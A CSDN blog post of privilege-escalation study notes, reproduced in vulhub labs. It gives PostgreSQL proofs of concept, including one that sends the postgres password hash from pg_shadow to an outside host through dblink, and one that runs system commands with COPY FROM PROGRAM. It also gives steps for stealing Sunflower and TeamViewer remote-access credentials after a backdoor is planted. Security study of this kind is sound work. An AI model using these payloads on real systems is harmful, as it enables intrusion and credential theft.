web-100 提权

已于 2024-09-14 21:51:22 修改
阅读量154 收藏
点赞数 2
分类专栏: 内网 文章标签: web安全
于 2024-09-11 22:09:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/token_x/article/details/142151229
版权
0x01 postgresql提权

vulhub复现,直接搜索,有两种提权,一个2018的一个2019的。2018的前提条件是需要一个数据库普通用户权限即可需要执行sql查询,然后执行sql命令留一个后门,需要等待数据库的管理员操作数据库的时候上线。2019的漏洞需要管理员权限,直接再sql语句中执行系统命令;

2018-poc

CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
    select dblink_connect((select 'hostaddr=10.0.0.1 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
    SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;

2019-poc

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

vulhub靶场复现步骤

https://vulhub.org/#/environments/postgres/CVE-2019-9193/
0x02 第三方提权

讲了cs上线后使用插件抓取向日葵或者是tv这种远控工具的识别码和密码进行远程的登录,相当于直接提权到本地用户了;

向日葵

向日葵抓取密文解密工具,使用python38运行

https://github.com/wafinfo/Sunflower_get_Password

teamviewer

步骤:生成msf后门,运行后门上线,运行teamviewer抓取密码的模块

模块名称为

run post/windows/gather/credentials/temviewer_passwords
0x03 redis
token_x
关注
专栏目录
WEB安全渗透测试》(27)Linux系统提权-SUID提权
午夜安全
06-14 932
WEB安全渗透测试》(27)Linux系统提权-SUID提权 提权,网络术语,指的是提高自己在服务器中的权限,如从普通用户提高到root用户,当网站被入侵后,攻击者会千方百计的去提高自己的权限,毕竟普通用户能干的事情太有限了。linux中除了r w x 三个权限外(分别代表r 读,w写,x执行),还有两个特殊的权限s 和t,当s权限在文件所有者x权限上时,例如:-rwsr-xr-x,此时称为Set UID,简称为SUID的特殊权限,即当执行该文件时将具有该文件所有者的权限。......
Web的基本漏洞--提权
尽欢
06-05 515
提权的介绍
渗透测试-sqlmap提权
lza20001103的博客
12-16 2319
渗透测试-sqlmap提权
15.CTF-web安全提权
woo233的博客
09-29 1979
往往我们能拿下服务器的web服务只是具有低权限用户(www-data),对于内网渗透,我们需要提权到root。Linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置。提权前提:已经拿到低权shell被入侵的机器上面有nc,python,perl等linux非常常见的工具有权限上传文件和下载文件。
网安学习-Linux提权
weixin_44770698的博客
07-23 1459
网安学习-Linux提权
烂土豆ms16-075提权
orange777
02-23 1186
环境信息 目标机: server2008 192.168.111.4 攻击机: kali 192.168.111.3 目标上线 首先通过制作html后门使目标机上线 可以发现当前目标机用户为administrator 通过当前会话框执行shell systeminfo查看当前系统信息,打补丁情况 把该信息粘贴到http://bugs.hacking8.com/tiquan/查看可以利用的漏洞 在GitHub上查找对应cs里烂土豆的插件,加载到cs中 https://github.com
WEB渗透Linux提权篇-提权工具合集
qq_59468567的博客
09-02 2207
用于检查可执行文件属性的 bash 脚本(如 PIE、RELRO、PaX、Canaries、ASLR、Fortify Source)枚举基本系统信息并搜索常见的权限提升向量,例如世界可写文件、错误配置、明文密码和适用的漏洞利用。检查文件权限、cron 作业(如果可见)、弱凭据等。搞个web服务提供下载。
WEB渗透Win提权篇-提权工具合集
qq_59468567的博客
08-26 2669
要运⾏ PowerUp,请启动 PowerShell 会话并使⽤ dot 加载脚本,请执⾏以下操。winPEAS 是⼀个⾮常强⼤的⼯具,它不仅积极寻找特权升级错误配置,⽽且还在。当使⽤命令⾏时,我们有 使⽤仍具有 /accepteula 命令⾏的旧版本选项。缺点是:程序的最新版本会⽣成⼀个 GUI"接受 EULA" 弹出窗⼝。您可以使⽤它来检查⽤户或组是否有权访问⽂件,⽬录,服务和注册表项。accesschk 是⼀个很旧的⼯具了,但我们依然可以尝试去⽤。Seatbelt 是⼀种枚举⼯具。
ms15-051提权
A_dmin的博客
09-14 4166
ms15-051提权 实验概述   Metasploit是一款开源的渗透测试工具,可以帮助安全员发现漏洞问题,此工具带有的攻击模块可以帮助安全员简单的利用相关的漏洞,本实验通过Metasploit对内网机器进行渗透,并且使用ms15-051进行权限提升获取window server 2003的system权限,最后进行远程控制。 实验目的   1、熟练metasploit的使用方法   2、学会m...
windows web提权
zyw268的博客
05-29 749
Web到Win-系统提权-人工操作如果提权中无法执行命令的话,可以尝试上传cmd.exe到可读写目录再调用优点:解决实时更新不集成的EXP缺点:操作繁琐,需要各种复现调试。
一句话的艺术-web提权.pdf
01-25
【一句话的艺术-web提权】是关于网络安全中的一种高级技巧,主要涉及如何在Web环境中,即使在存在各种安全防护措施的情况下,依然能够通过“一句话木马”执行任意代码。这篇文章主要探讨了如何在Web应用程序中绕过...
网络空间安全——利用 CVE-2017-0213 提权
Jay
12-22 588
VE-2017-0213 是一个比较冷门的COM 类型混淆 (Type Confusion)漏洞。巧妙的利用该漏洞,可以实现本地的。以窗口(cmd)形式打开并执行命令查看一下现在权限whoami发现是system权限说明利用成功了。该漏洞由著名的Google Project zero 发现。利用 CVE-2017-0213 简单提权。利用 CVE-2017-0213 简单提权。-2017-0213漏洞简单提权,首先下载CVE-2017-0213。接下来创建一个用户试试吧!下面就简单演示一下利用。
web渗透--提权辅助工具Windows-Exploit-Suggester
朝阳似锦 晖映山河
09-23 486
辅助工具介绍 辅助工具Windows-Exploit-Suggester此工具将目标补丁与Microsoft漏洞数据库进行比较,以检测目标潜在的缺失补丁。 必须在python2环境中运行 python2 -m pip install xlrd python2 windows-exploit-suggester.py --update 得到2020-09-23-mssb.xls文件 python2 windows-exploit-suggester.py -h usage: windows-expl
----已搬运----[蓝帽杯 2021]One Pointer PHP --- PHP数组溢出,Fastcgi FTP - SSRF 攻击 php-fpm - SUID提权 proc
Zero_Adam的博客
06-11 860
二、学到的&&不足: 三、学习WP: 给了源码,两个PHP文件: user.php: <?php class User{ public $count; } ?> add_api.php <?php include "user.php"; if($user=unserialize($_COOKIE["data"])){ $count[++$user->count]=1; // 数组$count的第几个属性赋值为1 if($count[]=1){ $us
端口隔离配置的实验
zhgjx_ywz的博客
09-28 751
LSW1-GigabitEthernet0/0/4]am isolate GigabitEthernet 0/0/5 // g0/0/4的报文不能发给g0/0/5,g0/0/5的报文可以发给g0/0/4。综上所述,端口隔离配置是一种有效的网络安全措施,可以在不增加VLAN资源消耗的情况下实现端口间的隔离和控制。在VLAN20中,PC4主机存在安全隐患,往其他主机发送大量的广播报文,通过配置接口间的单向隔离来实现其他主机对该主机报文的隔离。3、配置PC1、PC2、PC3、PC4、PC5。
网络安全概述:从认知到实践
最新发布
l1x1n0的博客
10-04 417
网络安全:保护网络系统的硬件、软件及数据,确保其不受破坏、泄露或篡改。网络安全是一个不断发展的领域,需要个人、企业和国家共同努力。提高安全意识,掌握基本防护技能,遵守相关法律法规,是每个网络用户应尽的责任。同时,网络安全产业的快速发展也为相关人才提供了广阔的职业前景。
【网络安全】Cookie与ID未强绑定导致账户接管
等风来
10-02 203
DigiLocker 是一项在线服务,旨在为公民提供一个安全的数字平台,用于存储和访问重要的文档,如 Aadhaar 卡、PAN 卡和成绩单等。DigiLocker 通过多因素身份验证(MFA)来保护用户账户安全,通常包括 6 位数的安全 PIN 和一次性密码(OTP)验证。
网络安全:保护您的数字世界
不迁怒,不贰过。小知识,大智慧。
09-29 1151
在当今数字化时代,网络安全已经成为每个人都应该关注的重要议题。随着互联网的普及和信息技术的快速发展,我们的个人信息、财务数据甚至国家安全都面临着来自网络的威胁。网络攻击日益猖獗,黑客利用漏洞和技术手段,威胁着我们的数字世界的安全。在这个信息爆炸的时代,数据的泄露和被篡改可能带来严重的后果,影响个人隐私、金融安全甚至国家稳定。因此,保护我们的数字世界免受网络攻击变得至关重要。本文将探讨网络安全的重要性,介绍网络安全的基本概念和最佳实践,帮助读者更好地了解如何保护自己在数字世界中的安全。让我们共同努力,建立一个
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 961
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
Web提权技巧:一句话木马的免杀艺术
"一句话的艺术-web提权.pdf" 这篇文章主要探讨的是如何在Web环境中,尤其是在存在安全防护软件的情况下,利用Webshell(通常是一句话木马)进行权限提升或执行任意代码的技术。随着网络安全意识的增强,许多服务器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值